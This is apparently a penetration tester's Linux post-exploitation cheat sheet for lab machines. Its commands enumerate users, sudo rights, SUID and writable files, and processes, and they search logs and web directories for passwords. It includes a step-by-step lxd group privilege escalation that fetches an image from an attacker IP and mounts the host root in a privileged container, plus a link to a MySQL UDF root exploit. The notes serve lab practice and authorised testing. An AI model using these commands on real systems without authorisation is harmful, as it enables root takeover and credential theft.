Post Exploit Checks

General Enumeration
Know if the environment is a real host
ls -la / # check if the root dir has .[dot] files we can know if its a docker env 
hostname
Know the permissions of the user
sudo -l
id
Know the users 
cat /etc/passwd
Check for .htaccess file
/etc/apache2/sites-enabled/*
/etc/nginx/nginx.conf
/etc/ssh/sshd_config
Application Specific Configs : wp-config, settings.php etc..,
Groups Exploitation
4(adm)
The adm group members can view the log files
cd /var/log
grep -EnRi password .
Machine: 
Academy - HTB : https://www.youtube.com/watch?v=yQl5RA6APyQ&t=2620​
Doctor - HTB : https://youtube.com/watch?v=JcOR9krOPFY&t=1780​
116(lxd)
The lxd users can create a malicious docker like contents to load the /root of the machine in a containerized environment
# attacker machine
git clone  https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
​
# victim machine
lxd init # yes to all 
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # Exp Output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # Exp Output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # shell will be obtained as root in the ignite container
cd /mnt/root # provides the root of the victim machine
Files Enumeration
Find suid binaries
find / -perm /4000 -ls 2>/dev/null
Find Writeable files
find / -type f -writable 2>/dev/null | grep -v proc
Find files owned by the user (group specific)
# ! -path <path> - omits files from the mentioned directory
# -group <group name> - group name
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
Locations to check
ls /opt
ls /usr/local/bin
ls ~/.local/bin
Background Jobs Enumeration
Crontabs
crontab -l
cat /etc/crontab
Enumerate processes with pspy​
Network Enumeration
Know the network adapters ( might be communicating internally )
ip a
Open Ports and services
netstat -antp
# look for unusal services running interally or mysql service 
Process Enumeration
Enumerate the services that are running 
ps aux
Get more information about the process (like the passed arguments etc.., it might contain passwords )
# know the process id from ps aux
cat /proc/<processid>/cmd
Web Directories
Check the web directories for passwords
/var/www/*
MYSQL 
If MYSQL is running as root in the machine check for priv esc via library 
​https://book.hacktricks.xyz/network-services-pentesting/pentesting-mysql#privilege-escalation-via-library​
​https://raw.githubusercontent.com/d7x/udf_root/master/udf_root.py​
The \G option in the sql query of the mysql prints the information in a prettier format
# Connecting to mysql
mysql -u root -p 
# password prompt
​
mysql> select * from wp_users \G # instead of "select * from wp_users;"

Last modified 8mo ago